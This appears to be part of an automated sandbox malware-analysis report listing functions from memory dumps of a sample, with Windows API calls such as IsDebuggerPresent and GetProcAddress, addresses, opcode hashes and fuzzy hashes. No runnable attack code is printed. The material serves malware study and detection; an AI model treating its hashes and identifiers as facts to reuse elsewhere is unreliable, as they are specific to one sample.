API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: 4d324a8d221e2db5cd00d45a2086900a0be2c9c4073d16e4d4d15737deefaec0
Instruction ID: d65fa3c9b65abe26ac63e53d790895197a9e7ca72ffe5a8ff8d25ceb3f0237ae
Opcode Fuzzy Hash: 4d324a8d221e2db5cd00d45a2086900a0be2c9c4073d16e4d4d15737deefaec0
Instruction Fuzzy Hash: 4A615771980207AFEB6CDF24CD82BAB77AAEF14300F104169E985C72C5EB389995DB54

Function 0040BFEB Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C0E3
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C0ED
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C0FA

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f15f390f9f67c0b7ec9a5ebf921ca1129c43e87d5122f8ed14452eb776dd0f38
Instruction ID: 653a5d69f6fc4a0783f85fb2e9fea74bce0c61e3419590a4e8c92b0e712be913
Opcode Fuzzy Hash: f15f390f9f67c0b7ec9a5ebf921ca1129c43e87d5122f8ed14452eb776dd0f38
Instruction Fuzzy Hash: B531D374901228DBCB21DF64D9897CDBBB4BF48354F5042EAE80CA7291EB749F858F49

Function 005FC252 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 005FC34A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 005FC354
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 005FC361

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d3ce0527382caf87a4183dbc95e1f4699e67cea7b1975356a88f3a13daa3af49
Instruction ID: 8b5e0526dee15b3dbd29e773b933ce90b2f5a8d1a97a06d2542b2156f652e0e8
Opcode Fuzzy Hash: d3ce0527382caf87a4183dbc95e1f4699e67cea7b1975356a88f3a13daa3af49
Instruction Fuzzy Hash: 0131C37490122D9BCB21DF68D9897ECBBB4BF48310F5085EAE50CA7290EB749F858F45

Function 005FC758 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,005FC757,00000000,?,?,00000000,?,006010C7), ref: 005FC77A
TerminateProcess.KERNEL32(00000000,?,005FC757,00000000,?,?,00000000,?,006010C7), ref: 005FC781
ExitProcess.KERNEL32 ref: 005FC793

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4074258ae3e92e5929474cff9357cd5b9568f201180147c8900c034a5ce98615
Instruction ID: 7eba8552efbbca28a3d7528723c458f966d10b76cc8a20937a02a74044faa290
Opcode Fuzzy Hash: 4074258ae3e92e5929474cff9357cd5b9568f201180147c8900c034a5ce98615
Instruction Fuzzy Hash: 85E0467144124CAFCF12BB24CD49AA93F2AFB44345F108428FA0A8A171CB39ED82CA84

Function 005F092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 005F095F
l, xrefs: 005F0966
GetProcAddress., xrefs: 005F09DC, 005F09DF, 005F09E4

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: b437e55aa1150b7aa29c0e0734b87b9c3710736e4c8244c2eae4c773cf33aefc
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: E931AEB2900209CFDB10CF88C980AAEBBF5FF48324F18504AD541A7352D3B5EA45CFA4

Function 0040C891 Relevance: 3.0, APIs: 2, Instructions: 34timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,004027D7,00000000,0040416A,FFC4BD39), ref: 0040C8A4
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040C8D5

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: 402b09224e765d9c673da96c5e2a658b9df076d986dd95d77c69bcc386cff3ad
Instruction ID: b1ba2b076e13d5236e3f63e61b60078bfcaafd006df03e2f40669a8f2c26cfa0
Opcode Fuzzy Hash: 402b09224e765d9c673da96c5e2a658b9df076d986dd95d77c69bcc386cff3ad
Instruction Fuzzy Hash: 28F09672910204FBDB14EF64C885BAD7BA9EB4031AF24C76AA506E62C0D678DA44C75D

Function 004132D4 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,004132CF,?,?,?,?,?,?,00000000), ref: 00413501

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f2a6d8770a078741a44d128e082ae11581cee39de0dadfcc6d3b67b2601d1eba
Instruction ID: b1ba56e48154efa4bb98e62eb15a76308b93f2ee1a486527aa1614a48e48cb64
Opcode Fuzzy Hash: f2a6d8770a078741a44d128e082ae11581cee39de0dadfcc6d3b67b2601d1eba
Instruction Fuzzy Hash: 8DB14C31610608DFD715CF28C486AA57BE1FF05365F258659E89ACF3A1C339EA82CB48

Function 0060353B Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,00603536,?,?,?,?,?,?,00000000), ref: 00603768

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f2a6d8770a078741a44d128e082ae11581cee39de0dadfcc6d3b67b2601d1eba
Instruction ID: 685800fdccdc7ae03530be7e9b9288d3520eb6ee1eb29ccf5e5c0816dff797eb
Opcode Fuzzy Hash: f2a6d8770a078741a44d128e082ae11581cee39de0dadfcc6d3b67b2601d1eba
Instruction Fuzzy Hash: E4B17F71620614DFD719CF28C48ABA67BA5FF05365F258658E899CF3E1C336EA42CB40

Function 004086E3 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004086F9

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 04d4c15717e0eb0a9da5fd3b40b00c7a7a9904e6caa8d1284099983198fdd583
Instruction ID: a7c81c8d420fc2cabcce577bf1756cbc8ccf77a7e325b6c205d36db79cc47824
Opcode Fuzzy Hash: 04d4c15717e0eb0a9da5fd3b40b00c7a7a9904e6caa8d1284099983198fdd583
Instruction Fuzzy Hash: 53517DB1A003158BEB28CF55DE81BAABBF0FB48314F64843ED851EB394D7789941CB58

Function 00418B63 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00410BB0: GetLastError.KERNEL32(00401F35,?,00401F39,0040C2E1,?,00401F35,?,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410BB5
Part of subcall function 00410BB0: SetLastError.KERNEL32(00000000,00000008,000000FF,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410C53

Part of subcall function 00410BB0: _free.LIBCMT ref: 00410C12
Part of subcall function 00410BB0: _free.LIBCMT ref: 00410C48

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00418BB7

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 5e0a73268fbc01f4adeb7a3017485357e3eeaf8af050f5590046d0bd20d83ea7
Instruction ID: a43874a8ed4730c084a24a4393e75ea5ae5628581d0759ef7db528966d406760
Opcode Fuzzy Hash: 5e0a73268fbc01f4adeb7a3017485357e3eeaf8af050f5590046d0bd20d83ea7
Instruction Fuzzy Hash: 0F217772615206ABDB289B15DD81AFB73A8EB44314B14407FFE01D6241EB78A9C19AA8

Function 00608DCA Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00600E17: GetLastError.KERNEL32(005F219C,?,005F21A0,005FC548,?,005F219C,?,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600E1C
Part of subcall function 00600E17: SetLastError.KERNEL32(00000000,0042A190,000000FF,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600EBA

Part of subcall function 00600E17: _free.LIBCMT ref: 00600E79
Part of subcall function 00600E17: _free.LIBCMT ref: 00600EAF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00608E1E

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 5bc436174cc0e3a881d60d03eb371d5cf67ba4087f83f3c4aef7badf7c865cd7
Instruction ID: 96a3cba2971ef8b9354124a31f64578de9cb233d92c43ca1f77440622fcb566d
Opcode Fuzzy Hash: 5bc436174cc0e3a881d60d03eb371d5cf67ba4087f83f3c4aef7badf7c865cd7
Instruction Fuzzy Hash: 3121BA7268020AAFDB2CDA24CC42ABB37AAEF44714B14006AE945D72C1EF74AD448A58

Function 004187EA Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00410BB0: GetLastError.KERNEL32(00401F35,?,00401F39,0040C2E1,?,00401F35,?,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410BB5
Part of subcall function 00410BB0: SetLastError.KERNEL32(00000000,00000008,000000FF,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410C53

EnumSystemLocalesW.KERNEL32(00418910,00000001,00000000,?,-00000050,?,00418F3E,00000000,?,?,?,00000055,?), ref: 0041885C

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 52f2cda3688226d2c693a6b3778f47ea4a48b98fd09da2d890bbb8aff8cf2f30
Instruction ID: aa1c70b1ed764da0327c3003c8fae3aa7d61a561d5d8550af3182edfb5d0803a
Opcode Fuzzy Hash: 52f2cda3688226d2c693a6b3778f47ea4a48b98fd09da2d890bbb8aff8cf2f30
Instruction Fuzzy Hash: 1811C6366047055FDB18AF39C8916BBB791FB80358B58443EE58647B40DB757982C784

Function 00608A51 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00600E17: GetLastError.KERNEL32(005F219C,?,005F21A0,005FC548,?,005F219C,?,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600E1C
Part of subcall function 00600E17: SetLastError.KERNEL32(00000000,0042A190,000000FF,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600EBA

EnumSystemLocalesW.KERNEL32(00418910,00000001,00000000,?,-00000050,?,006091A5,00000000,?,?,?,00000055,?), ref: 00608AC3

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 52f2cda3688226d2c693a6b3778f47ea4a48b98fd09da2d890bbb8aff8cf2f30
Instruction ID: a23cb0b80de70a8337a73df2ebf7630c566ce96584d834a01c138e720e36db1b
Opcode Fuzzy Hash: 52f2cda3688226d2c693a6b3778f47ea4a48b98fd09da2d890bbb8aff8cf2f30
Instruction Fuzzy Hash: 2A11E9362047059FDB1CDF39C8916BBBB92FF84768B18442DE98687B80E775B942C740

Function 00418D8F Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00410BB0: GetLastError.KERNEL32(00401F35,?,00401F39,0040C2E1,?,00401F35,?,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410BB5
Part of subcall function 00410BB0: SetLastError.KERNEL32(00000000,00000008,000000FF,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410C53

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00418B2C,00000000,00000000,?), ref: 00418DBB

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 6dd4d5c19a520f287de4a3637a0495bc3ade3141b3e6c407e4f0bca849112d04
Instruction ID: c8bdd0a11fdbfa154e6aa57709e511e9a0df23b7cfb0f341dc6043ddff668b1f
Opcode Fuzzy Hash: 6dd4d5c19a520f287de4a3637a0495bc3ade3141b3e6c407e4f0bca849112d04
Instruction Fuzzy Hash: A3F0F932A002117BDB245B25D805BFB7B65EB40354F05442EEC45A32C0EE78FD82D5D8

Function 00608FF6 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00600E17: GetLastError.KERNEL32(005F219C,?,005F21A0,005FC548,?,005F219C,?,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600E1C
Part of subcall function 00600E17: SetLastError.KERNEL32(00000000,0042A190,000000FF,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600EBA

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00608D93,00000000,00000000,?), ref: 00609022

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 6dd4d5c19a520f287de4a3637a0495bc3ade3141b3e6c407e4f0bca849112d04
Instruction ID: e3d1db6d81ed2d10e072f8c5a146dc359990b566ad8501d674e644f5c9534557
Opcode Fuzzy Hash: 6dd4d5c19a520f287de4a3637a0495bc3ade3141b3e6c407e4f0bca849112d04
Instruction Fuzzy Hash: 18F0F432A80115BBDB2C5B61C806BFB776AEB40764F14442DEC57A32C1EA74FE41C6A0

Function 00418885 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00410BB0: GetLastError.KERNEL32(00401F35,?,00401F39,0040C2E1,?,00401F35,?,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410BB5
Part of subcall function 00410BB0: SetLastError.KERNEL32(00000000,00000008,000000FF,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410C53

EnumSystemLocalesW.KERNEL32(00418B63,00000001,00000003,?,-00000050,?,00418F02,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004188CF

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e88768709ce77283dcbe0652124a39e7464e8be8d6ed30090f0a7a95db169885
Instruction ID: 437b6e59429d6c5a8ca4ff909878e25212220c8ec2d211905ea83408b5c22700
Opcode Fuzzy Hash: e88768709ce77283dcbe0652124a39e7464e8be8d6ed30090f0a7a95db169885
Instruction Fuzzy Hash: 0BF0C2366043046FDB146F39D881ABB7B91FB80768F15442EFA454B680DBB5AC81D658

Function 00608AEC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00600E17: GetLastError.KERNEL32(005F219C,?,005F21A0,005FC548,?,005F219C,?,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600E1C
Part of subcall function 00600E17: SetLastError.KERNEL32(00000000,0042A190,000000FF,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600EBA

EnumSystemLocalesW.KERNEL32(00418B63,00000001,00000003,?,-00000050,?,00609169,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00608B36

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e88768709ce77283dcbe0652124a39e7464e8be8d6ed30090f0a7a95db169885
Instruction ID: 0289f8a496711ad51c423c250fd341f6b8c8f08f9ba59ae74c325cbb4abb7830
Opcode Fuzzy Hash: e88768709ce77283dcbe0652124a39e7464e8be8d6ed30090f0a7a95db169885
Instruction Fuzzy Hash: 5CF046722403045FDB189F34C881ABBBB92EF81728F14442CF9814B6C0DBB1AC02C604

Function 00411112 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0040CA42: EnterCriticalSection.KERNEL32(?,?,0040DBA0,00000000,004291B8,0000000C,0040DB67,?,?,004110A1,?,?,00410D52,00000001,00000364,00000008), ref: 0040CA51

EnumSystemLocalesW.KERNEL32(Function_00011105,00000001,00429318,0000000C,00411530,?), ref: 0041114A

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d271cd6361e28e3cd4b152f3043296ca8766348b0ae154b7c1c661ad36fb6b24
Instruction ID: 4e52fd7a85df06863707ead34e1dce039ce370f30dd9bf8b2dba32197df83b97
Opcode Fuzzy Hash: d271cd6361e28e3cd4b152f3043296ca8766348b0ae154b7c1c661ad36fb6b24
Instruction Fuzzy Hash: B2F03772A40204EFD710EF99E882B9D77F0EB48725F10812FF914AB2E0CB7959458B88

Function 00601379 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 005FCCA9: RtlEnterCriticalSection.NTDLL(?), ref: 005FCCB8

EnumSystemLocalesW.KERNEL32(00411105,00000001,00429318,0000000C,00601797,?), ref: 006013B1

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d271cd6361e28e3cd4b152f3043296ca8766348b0ae154b7c1c661ad36fb6b24
Instruction ID: 035f82f6e6fd3a4457d4419fa9e77d849200f310e7e8046f707ec8d0c9b1ba81
Opcode Fuzzy Hash: d271cd6361e28e3cd4b152f3043296ca8766348b0ae154b7c1c661ad36fb6b24
Instruction Fuzzy Hash: 36F04F72A40309DFD710EF98E846B9D7BF0FB48721F10402AF514DB2E0CB7959448B88

Function 0041879F Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00410BB0: GetLastError.KERNEL32(00401F35,?,00401F39,0040C2E1,?,00401F35,?,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410BB5
Part of subcall function 00410BB0: SetLastError.KERNEL32(00000000,00000008,000000FF,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 00410C53

EnumSystemLocalesW.KERNEL32(004186F8,00000001,00000003,?,?,00418F60,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004187D6

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7840123959a7b129bd6487beb46784ad75e64843d81f3dc56a5e04e457d5ac72
Instruction ID: 2f121db09614d1c6bedb1170cde7f525f1c5e970b44d0e6c8880c2569ebb2296
Opcode Fuzzy Hash: 7840123959a7b129bd6487beb46784ad75e64843d81f3dc56a5e04e457d5ac72
Instruction Fuzzy Hash: 03F0553A30020457CB049F39DC557ABBF90EFC1714F16409EFA058B280CA799882C798

Function 00608A06 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00600E17: GetLastError.KERNEL32(005F219C,?,005F21A0,005FC548,?,005F219C,?,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600E1C
Part of subcall function 00600E17: SetLastError.KERNEL32(00000000,0042A190,000000FF,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 00600EBA

EnumSystemLocalesW.KERNEL32(004186F8,00000001,00000003,?,?,006091C7,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00608A3D

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7840123959a7b129bd6487beb46784ad75e64843d81f3dc56a5e04e457d5ac72
Instruction ID: 3dd20888cc07a1b10098ac4c456ede0b099837d7fb62ca77608d707a052789de
Opcode Fuzzy Hash: 7840123959a7b129bd6487beb46784ad75e64843d81f3dc56a5e04e457d5ac72
Instruction Fuzzy Hash: D7F055363802089BCB08AF39C805BAB7F91EFC2720F06405DEA058B681CA719842C754

Function 00411634 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0040FC12,?,20001004,00000000,00000002,?,?,0040F21F), ref: 00411668

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7dfd2f7fe9333bcd9ab1f1e649f3dfd416cee645eef405dfc41d56f5540eb6f2
Instruction ID: 7cd7949c1eb9c99d239f511be295c3ed7e76b585c106e5131c90d795d90ccafb
Opcode Fuzzy Hash: 7dfd2f7fe9333bcd9ab1f1e649f3dfd416cee645eef405dfc41d56f5540eb6f2
Instruction Fuzzy Hash: 83E04F3150012CBBCF122F61EC04FEE3F16EF44760F048426FE0565270CB3A8961AA9D

Function 0060189B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,005FFE79,?,20001004,00000000,00000002,?,?,005FF486), ref: 006018CF

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e4c789af67278788dffe9a087bd2880ff700be03534d4701b505ff5e7740c75a
Instruction ID: 5d6ac9086b7524b1128e36c9e963c54c52724464d05aec811be4b322ff675595
Opcode Fuzzy Hash: e4c789af67278788dffe9a087bd2880ff700be03534d4701b505ff5e7740c75a
Instruction Fuzzy Hash: AEE04F31940218BBCF162F61DC08ADF3F67EF45760F008025FD056A2A1DB718921AAD8

Function 00408679 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00008685,0040825B), ref: 0040867E

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 587d3111a60e8b663521702ed8e7b5a1dd79d1b5c575b23059856a794efea15e
Instruction ID: 1dca734963b750bb47842ecc72a8d06f390ccc80cbdf3d506dedb000c4e15f13
Opcode Fuzzy Hash: 587d3111a60e8b663521702ed8e7b5a1dd79d1b5c575b23059856a794efea15e
Instruction Fuzzy Hash:

Function 005F88E0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00408685,005F84C2), ref: 005F88E5

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 587d3111a60e8b663521702ed8e7b5a1dd79d1b5c575b23059856a794efea15e
Instruction ID: 1dca734963b750bb47842ecc72a8d06f390ccc80cbdf3d506dedb000c4e15f13
Opcode Fuzzy Hash: 587d3111a60e8b663521702ed8e7b5a1dd79d1b5c575b23059856a794efea15e
Instruction Fuzzy Hash:

Function 004168EC Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 004168EC

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: be0d64fc628961a75c7fea696ec86539ed3f2f6f90ec2866f805486d45399620
Instruction ID: 9a80fc1e86b51b65d844f4e1b3b296cb5ecca0acffe3ceb98a2f460cf26000b7
Opcode Fuzzy Hash: be0d64fc628961a75c7fea696ec86539ed3f2f6f90ec2866f805486d45399620
Instruction Fuzzy Hash: 83A011B0A002088B83008F30AE083083EA8BA082E0B808238A000C2020EB208002AA08

Function 00413AB9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

